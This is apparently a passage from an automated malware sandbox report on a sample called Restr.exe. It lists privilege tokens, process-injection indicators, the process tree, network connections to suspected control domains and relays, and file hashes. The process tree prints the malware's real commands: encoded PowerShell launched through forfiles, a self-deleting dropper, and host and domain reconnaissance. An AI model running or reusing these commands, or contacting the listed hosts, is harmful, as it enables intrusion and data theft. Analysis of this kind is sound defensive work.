Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2020 wrote to memory of 1080 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 844 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1292 wrote to memory of 1368 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 304 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\iexpress.exe

iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\6D90.bin

C:\Windows\system32\makecab.exe

C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Columnsoftware.DDF"

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\A5C0.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\syswow64\svchost.exe

C:\Windows\syswow64\svchost.exe

C:\Windows\system32\cmd.exe

cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5BA0.bin0

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5BA0.bin0 > C:\Users\Admin\AppData\Local\Temp\5BA0.bin & del C:\Users\Admin\AppData\Local\Temp\5BA0.bin0"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\whoami.exe

whoami /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\7AD4.bin0 > C:\Users\Admin\AppData\Local\Temp\7AD4.bin & del C:\Users\Admin\AppData\Local\Temp\7AD4.bin0"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
UA 87.120.36.210:443 tcp
US 209.141.45.189:80 209.141.45.189 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
US 199.249.230.73:80 199.249.230.73 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 198.98.61.131:80 198.98.61.131 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
LV 46.183.217.5:80 46.183.217.5 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
NL 50.7.178.34:80 tcp
US 172.104.208.190:80 172.104.208.190 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
CR 200.122.181.78:80 200.122.181.78 tcp
NL 51.15.76.56:9030 51.15.76.56 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
DE 178.254.35.99:80 178.254.35.99 tcp
US 199.249.230.114:80 199.249.230.114 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 67.11.225.49:8080 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 199.249.230.142:80 199.249.230.142 tcp
US 199.249.230.73:80 199.249.230.73 tcp
DE 178.254.31.125:80 178.254.31.125 tcp
US 199.249.230.150:80 199.249.230.150 tcp
US 199.249.230.73:80 199.249.230.73 tcp
US 199.249.230.176:80 199.249.230.176 tcp
NL 93.174.93.133:80 93.174.93.133 tcp
US 199.249.230.115:80 199.249.230.115 tcp
US 198.98.61.131:80 198.98.61.131 tcp
US 199.249.230.102:80 199.249.230.102 tcp
US 199.249.230.103:80 199.249.230.103 tcp
US 73.222.93.39:9040 73.222.93.39 tcp
HU 91.219.238.221:80 91.219.238.221 tcp
DE 116.202.179.148:80 116.202.179.148 tcp
SE 193.189.100.202:80 193.189.100.202 tcp
US 199.249.230.103:80 199.249.230.103 tcp
FR 86.105.212.130:9030 86.105.212.130 tcp
DE 79.205.254.110:80 79.205.254.110 tcp
ID 195.123.237.161:80 195.123.237.161 tcp
US 199.249.230.168:80 199.249.230.168 tcp
US 199.249.230.113:80 199.249.230.113 tcp
LV 94.100.6.27:80 94.100.6.27 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
LU 107.189.7.156:80 107.189.7.156 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
US 199.249.230.80:80 199.249.230.80 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
DE 92.222.79.186:80 92.222.79.186 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
DE 179.43.141.92:80 179.43.141.92 tcp
US 199.249.230.176:80 199.249.230.176 tcp
US 185.220.103.120:80 185.220.103.120 tcp
LU 107.189.10.237:80 107.189.10.237 tcp
CH 195.206.105.217:80 195.206.105.217 tcp
US 199.249.230.85:80 199.249.230.85 tcp
US 199.249.230.176:80 199.249.230.176 tcp
ZA 160.119.249.223:80 160.119.249.223 tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
US 199.249.230.144:80 199.249.230.144 tcp
NL 80.100.69.97:80 80.100.69.97 tcp
US 45.61.188.251:80 45.61.188.251 tcp
US 199.249.230.162:80 199.249.230.162 tcp
CL 37.235.52.67:80 37.235.52.67 tcp
US 199.249.230.106:80 199.249.230.106 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
SE 193.189.100.203:80 193.189.100.203 tcp
US 199.249.230.117:80 199.249.230.117 tcp
US 204.44.81.158:8080 204.44.81.158 tcp
NL 5.79.79.133:80 5.79.79.133 tcp
US 199.249.230.112:80 199.249.230.112 tcp
CA 158.69.205.247:9030 158.69.205.247 tcp
US 199.249.230.169:80 199.249.230.169 tcp
DE 185.216.179.206:80 185.216.179.206 tcp
LV 94.100.6.27:80 94.100.6.27 tcp
US 199.249.230.150:80 199.249.230.150 tcp
KG 91.213.233.60:80 91.213.233.60 tcp
NL 212.83.167.220:9030 212.83.167.220 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp

Files

memory/304-54-0x000000000052E000-0x0000000000539000-memory.dmp

memory/304-55-0x000000000052E000-0x0000000000539000-memory.dmp

memory/304-56-0x0000000000230000-0x000000000023C000-memory.dmp

memory/304-58-0x0000000001000000-0x000000000106F000-memory.dmp

memory/304-57-0x0000000075C41000-0x0000000075C43000-memory.dmp

memory/304-59-0x0000000000240000-0x0000000000250000-memory.dmp

memory/304-65-0x0000000000270000-0x0000000000272000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat

MD5 db9b19619a023808d90d8c33b3445017
SHA1 382a05ad8f0efbcec4631b004a9eb1c0947c47cd
SHA256 37483ec746105f9d6669ad229d4f4b04098a6e7e90584d7adfc188f7866a066c
